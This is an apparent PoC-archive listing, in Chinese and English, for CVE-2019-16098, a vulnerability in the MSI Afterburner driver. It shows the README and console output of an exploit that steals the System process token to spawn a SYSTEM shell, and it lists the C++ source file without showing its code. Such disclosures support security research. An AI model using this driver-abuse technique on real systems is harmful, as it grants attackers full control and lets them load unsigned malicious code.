POC详情: 20b627ea0a4049efad3bb43b226774e09e47c0e6

来源
关联漏洞
标题: Micro Star MSI Afterburner 安全漏洞 (CVE-2019-16098)
描述:Micro Star MSI Afterburner是中国台湾微星科技(Micro Star)公司的一款显卡超频实用程序。 Micro Star MSI Afterburner 4.6.2.15658版本中存在安全漏洞。攻击者可利用该漏洞向任意内存、I/O端口和MSRs执行读取和写入操作,进而提升权限,执行代码,泄露信息并可能绕过Microsoft驱动程序签名策略,部署恶意代码。
描述
Local privilege escalation PoC exploit for CVE-2019-16098
介绍
# CVE-2019-16098

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys
and RTCore32.sys) allows any authenticated user to read and write to
arbitrary memory, I/O ports, and MSRs. This can be exploited for
privilege escalation, code execution under high privileges, and
information disclosure. These signed drivers can also be used to
bypass the Microsoft driver-signing policy to deploy malicious code.

For more updates, visit [CVE-2019-16098](https://nvd.nist.gov/vuln/detail/CVE-2019-16098)

**WARNING**: Hardcoded Windows 10 x64 Version 1903 offsets!

```
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>
```

文件快照

[4.0K] /data/pocs/20b627ea0a4049efad3bb43b226774e09e47c0e6 ├── [ 94] CMakeLists.txt ├── [ 489] CMakeSettings.json ├── [7.6K] CVE-2019-16098.cpp └── [1.3K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。